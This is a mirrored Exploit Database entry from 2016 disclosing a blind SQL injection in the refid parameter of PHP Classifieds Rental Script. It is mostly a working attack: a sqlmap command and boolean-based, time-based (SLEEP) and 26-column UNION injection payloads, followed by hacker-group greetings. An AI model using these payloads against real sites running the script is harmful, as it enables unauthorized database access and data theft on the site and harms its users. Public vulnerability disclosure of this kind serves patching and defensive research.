PHP Classifieds Rental Script – Blind SQL Injection

• Exploit Database
• 15 阅读

• 作者： OoN_Boy
  日期： 2016-10-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40467/

• [x]========================================================================================================================================[x]
   | Title	: PHP Classifieds Rental Script Blind SQL Vulnerabilities
   | Software	: PHP Classifieds Rental Script
   | Vendor	: http://www.i-netsolution.com/
   | Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
   | Date : 06 October 2016
   | Author	: OoN_Boy
  [x]========================================================================================================================================[x]
   
   
   
  [x]========================================================================================================================================[x]
   | Technology		: PHP
   | Database		: MySQL
   | Price		: $ 99
   | Description		: PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
  			so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
  			an easy-to- use software, this Property Rental Script
  [x]========================================================================================================================================[x]
   
   
  [x]========================================================================================================================================[x]
   | Exploit	: http://localhost/product_details.php?refid=%Inject_Here%1319258872
   | Aadmin Page	: http://localhost/[path]/admin/index.php
  [x]========================================================================================================================================[x]
   
   
   
  [x]========================================================================================================================================[x]
   | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
  [x]========================================================================================================================================[x] 
  
   ---
  Parameter: refid (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
  
  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 OR time-based blind
  Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
  
  Type: UNION query
  Title: MySQL UNION query (NULL) - 26 columns
  Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
  ---
  
  
  [x]========================================================================================================================================[x]
   
   
   
  [x]========================================================================================================================================[x]
   | Greetz	: antisecurity.org batamhacker.or.id
   | 		Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
   |		k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
  [x]========================================================================================================================================[x]
  
  [x]========================================================================================================================================[x]
  | Hi All long time no see ^_^
  [x]========================================================================================================================================[x]